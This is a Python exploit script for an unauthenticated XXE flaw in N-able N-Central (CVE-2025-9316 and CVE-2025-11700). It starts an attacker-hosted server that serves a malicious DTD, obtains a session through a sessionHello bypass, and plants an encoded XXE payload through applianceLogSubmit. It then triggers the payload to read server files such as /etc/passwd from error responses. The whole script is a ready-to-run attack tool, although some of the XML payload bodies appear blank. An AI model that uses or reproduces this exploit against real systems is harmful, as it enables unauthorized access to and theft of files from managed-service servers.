#!/usr/bin/env python3 """ N-able N-Central Unauthenticated XXE Vulnerability Exploit (CVE-2025-9316 and CVE-2025-11700) Usage: python3 ncentral_xxe_file_read.py --url http://10.0.40.62 --listen-ip 192.168.1.100 --listen-port 8080 """ import argparse import requests import base64 import xml.etree.ElementTree as ET import re import sys import threading import socket import time from http.server import HTTPServer, BaseHTTPRequestHandler from urllib.parse import urljoin class DTDHandler(BaseHTTPRequestHandler): """HTTP handler for serving the evil DTD file""" def __init__(self, target_file, *args, **kwargs): self.target_file = target_file super().__init__(*args, **kwargs) def do_GET(self): """Handle GET requests for the DTD file""" if self.path == '/evil.dtd': dtd_content = f''' "> %eval; %error;''' self.send_response(200) self.send_header('Content-Type', 'application/xml-dtd') self.send_header('Content-Length', str(len(dtd_content))) self.end_headers() self.wfile.write(dtd_content.encode('utf-8')) print(f"[+] Served evil.dtd to {self.client_address[0]}") else: self.send_response(404) self.end_headers() def log_message(self, format, *args): """Suppress default HTTP server logging""" pass class DTDServer: """Simple HTTP server to host the DTD file""" def __init__(self, listen_ip, listen_port, target_file="/etc/passwd"): self.listen_ip = listen_ip self.listen_port = listen_port self.target_file = target_file self.server = None self.thread = None def start(self): """Start the DTD server in a background thread""" try: # Create handler with target_file bound handler = lambda *args, **kwargs: DTDHandler(self.target_file, *args, **kwargs) self.server = HTTPServer((self.listen_ip, self.listen_port), handler) self.thread = threading.Thread(target=self.server.serve_forever, daemon=True) self.thread.start() print(f"[+] Started DTD server at http://{self.listen_ip}:{self.listen_port}/evil.dtd") if self.listen_ip == '0.0.0.0': print(f"[+] Server listening on all interfaces (0.0.0.0:{self.listen_port})") else: print(f"[+] Server listening on {self.listen_ip}:{self.listen_port}") time.sleep(0.5) # Give server time to start return True except Exception as e: print(f"[-] Failed to start DTD server: {e}") raise def stop(self): """Stop the DTD server""" if self.server: self.server.shutdown() print(f"[+] Stopped DTD server") class NableXXEExploit: def __init__(self, base_url): self.base_url = base_url.rstrip('/') self.session = requests.Session() # Disable SSL warnings for self-signed certificates requests.packages.urllib3.disable_warnings() self.session.verify = False self.dtd_server = None def step1_get_session_id(self, appliance_id=3): """Step 1: Get limited appliance session ID via sessionHello bypass""" print(f"[+] Step 1: Getting session ID for appliance {appliance_id}") # SessionHello SOAP request to ServerUI endpoint soap_request = f''' {appliance_id} ''' url = urljoin(self.base_url, '/dms/services/ServerUI') headers = { 'SOAPAction': '""', 'Content-Type': 'text/xml; charset=utf-8' } try: response = self.session.post(url, data=soap_request, headers=headers) print(f"Status Code: {response.status_code}") if response.status_code == 200: # Parse the session ID from response session_id = self.parse_session_id(response.text) if session_id: print(f"[+] Got session ID: {session_id}") return session_id else: print("[-] Could not extract session ID from response") print(f"Response: {response.text[:500]}") else: print(f"[-] Failed to get session ID: {response.text}") except requests.RequestException as e: print(f"[-] Request failed: {e}") return None def parse_session_id(self, response_text): """Extract session ID from SOAP response""" try: # Look for session ID in the response (try different case variations) patterns = [ r']*>(\d+)', # Capital case r'(\d+)', # Lowercase r'(\d+)', # Mixed case ] for pattern in patterns: session_match = re.search(pattern, response_text) if session_match: return session_match.group(1) except Exception as e: print(f"[-] Error parsing session ID: {e}") return None def step2_write_xxe_payload(self, session_id, target_file, listen_ip, listen_port): """Step 2: Write XXE payload file using applianceLogSubmit""" print(f"[+] Step 2: Writing XXE payload to target {target_file}") # Create XXE payload xxe_payload = f''' %xxe; ]> Network XXE Test ''' # Base64 encode the payload encoded_payload = base64.b64encode(xxe_payload.encode('utf-8')).decode('utf-8') # SOAP request to write the file soap_request = f''' {session_id} NETWORK_CHECK_LOG {encoded_payload} ''' url = urljoin(self.base_url, '/dms/services/ServerMMS') headers = { 'SOAPAction': '""', 'Content-Type': 'text/xml; charset=utf-8' } try: response = self.session.post(url, data=soap_request, headers=headers) print(f"Status Code: {response.status_code}") if response.status_code == 200: print("[+] XXE payload file written successfully") return True else: print(f"[-] Failed to write payload: {response.text}") except requests.RequestException as e: print(f"[-] Request failed: {e}") return False def step3_trigger_xxe(self, target_file="/etc/passwd", appliance_id=3): """Step 3: Trigger XXE via importServiceTemplateFromFile""" print(f"[+] Step 3: Triggering XXE to read {target_file}") # The file path where our payload was written payload_file = f"/opt/nable/webapps/ROOT/applianceLog/network_check_log_{appliance_id}.log" # SOAP request to trigger XXE soap_request = f''' 1 1 {payload_file} ''' url = urljoin(self.base_url, '/dms/services/ServerUI') headers = { 'SOAPAction': '""', 'Content-Type': 'text/xml; charset=utf-8' } try: response = self.session.post(url, data=soap_request, headers=headers) print(f"Status Code: {response.status_code}") #print(f"Response: {response.text}") # Look for file contents in error message self.extract_file_contents(response.text, target_file) except requests.RequestException as e: print(f"[-] Request failed: {e}") def extract_file_contents(self, response_text, target_file): """Extract file contents from XXE error response""" print(f"\n[+] Attempting to extract {target_file} contents from response:") # Look for file contents in the detail section - they appear after /nonexistent/ detail_match = re.search(r'\[tid:[^\]]+\] /nonexistent/(.*?)(?: \(File name too long\))?', response_text, re.DOTALL) if detail_match: file_contents = detail_match.group(1).strip() print(f"SUCCESS! Extracted {target_file} contents:") print("=" * 60) print(file_contents) print("=" * 60) return file_contents # Fallback to other patterns patterns = [ r'(.*?)', r'(.*?)', r'error.*?file:///.*?/(.*?)\'', ] for pattern in patterns: matches = re.findall(pattern, response_text, re.DOTALL) for match in matches: if len(match.strip()) > 50: # Likely contains file contents print(f"Potential file contents found:") print("=" * 50) print(match.strip()) print("=" * 50) return match.strip() print("[-] Could not extract file contents from response") print("Full response for manual analysis:") print(response_text) def run_full_exploit(self, target_file, listen_ip, listen_port, appliance_id): """Run the complete exploit chain""" print(f"[+] Starting N-able N-Central XXE exploit against {self.base_url}") print(f"[+] Target file: {target_file}") print(f"[+] DTD server: {listen_ip}:{listen_port}") # Start DTD server print("[+] Starting built-in DTD server...") self.dtd_server = DTDServer(listen_ip, listen_port, target_file) if not self.dtd_server.start(): print("[-] Failed to start DTD server, aborting") return False try: # Step 1: Get session ID session_id = self.step1_get_session_id(appliance_id) if not session_id: print("[-] Failed to get session ID, aborting") return False # Step 2: Write XXE payload if not self.step2_write_xxe_payload(session_id, target_file, listen_ip, listen_port): print("[-] Failed to write XXE payload, aborting") return False # Give the target a moment to process the file write print("[+] Waiting 2 seconds for file write to complete...") time.sleep(2) # Step 3: Trigger XXE self.step3_trigger_xxe(target_file, appliance_id) return True finally: # Stop DTD server if self.dtd_server: self.dtd_server.stop() def test_endpoints(self): """Test if the vulnerable endpoints are accessible""" print(f"[+] Testing endpoint accessibility on {self.base_url}") endpoints = [ '/dms/services/ServerUI', '/dms/services/ServerMMS' ] for endpoint in endpoints: url = urljoin(self.base_url, endpoint) try: response = self.session.get(url) print(f"[+] {endpoint}: Status {response.status_code}") if response.status_code == 200 and 'wsdl' in response.text.lower(): print(f" WSDL endpoint detected") except requests.RequestException as e: print(f"[-] {endpoint}: Error - {e}") def main(): parser = argparse.ArgumentParser( description='N-able N-Central XXE Vulnerability Exploit', epilog=''' Examples: python3 nable_xxe_exploit.py --url http://10.0.40.62 --listen-ip 192.168.1.100 --listen-port 8080 python3 nable_xxe_exploit.py --url http://10.0.40.62 --listen-ip 192.168.1.100 --listen-port 8080 --file /etc/hosts python3 nable_xxe_exploit.py --url http://10.0.40.62 --test-only ''' ) parser.add_argument('--url', required=True, help='N-Central Base URL') parser.add_argument('--listen-ip', required=True, help='IP address for DTD server to bind to') parser.add_argument('--listen-port', type=int, required=True, help='Port for DTD server to bind to') parser.add_argument('--file', default='/etc/passwd', help='Target file to read (default: /etc/passwd)') parser.add_argument('--appliance-id', type=int, default=3, help='Appliance ID to use (default: 3)') parser.add_argument('--test-only', action='store_true', help='Only test endpoint accessibility') args = parser.parse_args() exploit = NableXXEExploit(args.url) if args.test_only: exploit.test_endpoints() else: exploit.run_full_exploit(args.file, args.listen_ip, args.listen_port, args.appliance_id) if __name__ == '__main__': main()